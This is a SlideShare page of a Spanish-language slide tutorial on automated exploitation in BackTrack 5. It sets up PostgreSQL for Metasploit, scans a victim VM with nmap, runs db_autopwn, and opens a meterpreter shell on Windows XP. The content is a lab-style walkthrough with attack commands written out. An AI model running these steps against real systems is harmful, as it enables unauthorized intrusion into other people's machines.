Db autopwn backtrack_5

2,522 views
2,449 views

Published on

Hacer un db_autopwn en backtrack 5
http://linuxelcomienzodelalibertad.blogspot.com/

Published in: Education
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,522
On SlideShare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
93
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Db autopwn backtrack_5

  1. 1. ESTE TUTORIAL ES PARA FINES EDUCATIVIOS Como hacer un autopwn en backtrack 5 con nmap, metasploit y postgresqlAquí les dejo el post original de la info para que lo verifiquen: Metasploit db_autopwn using PostgreSQLEl backtrack 5 no trae instalado el postgresql por eso deve escribir en una terminal:apt-get install postgresql libpq-devel libpq trabaja con las peticiones y respuestas entre cliente y servidor en el postgresql.Al finalizar la instalación conectamos con el postgresql y cambiamos el passwordsudo su postgres -c psql
  2. 2. Aquí pones el password nuevo.ALTER USER postgres WITH PASSWORD password ;después qsudo passwd -d postgressudo su postgres -c passwd con este se cambia el password Esto es para conectarse del ruby al postgresql.gem install pg
  3. 3. Ahora llamamos a metasploitmsfconsoledb_driver postgresqly para conectar con la base de datosdb_connect postgres:”password”@127.0.0.1/metasploitdbEl password que habías puesto anterior mente. Aquí va el nombre que le quiera asignar a la base de datos.Ahora utilizamos nmap para ver las vulnerabilidades de la víctima.nmap -sV -O 10.0.0.71 <-------- el numero ip de la víctima que para el tutorial es una maquina virtualde xp sp 1.
  4. 4. Nmap escaneo los puertos e identifico el sistema operativo de la víctima.Ahora procedemos con el ataque.db_hostsdb_autopwn -t -p -eAL terminar el autopwn muestra las posibles sesiones.Para entrar a una de ellassessions -i 1 el numero es la sesión que fue elegida.
  5. 5. Aquí se puede ver como entra al shell de windows desde meterpreter. ESTE TUTORIAL ES PARA FINES EDUCATIVIOS

×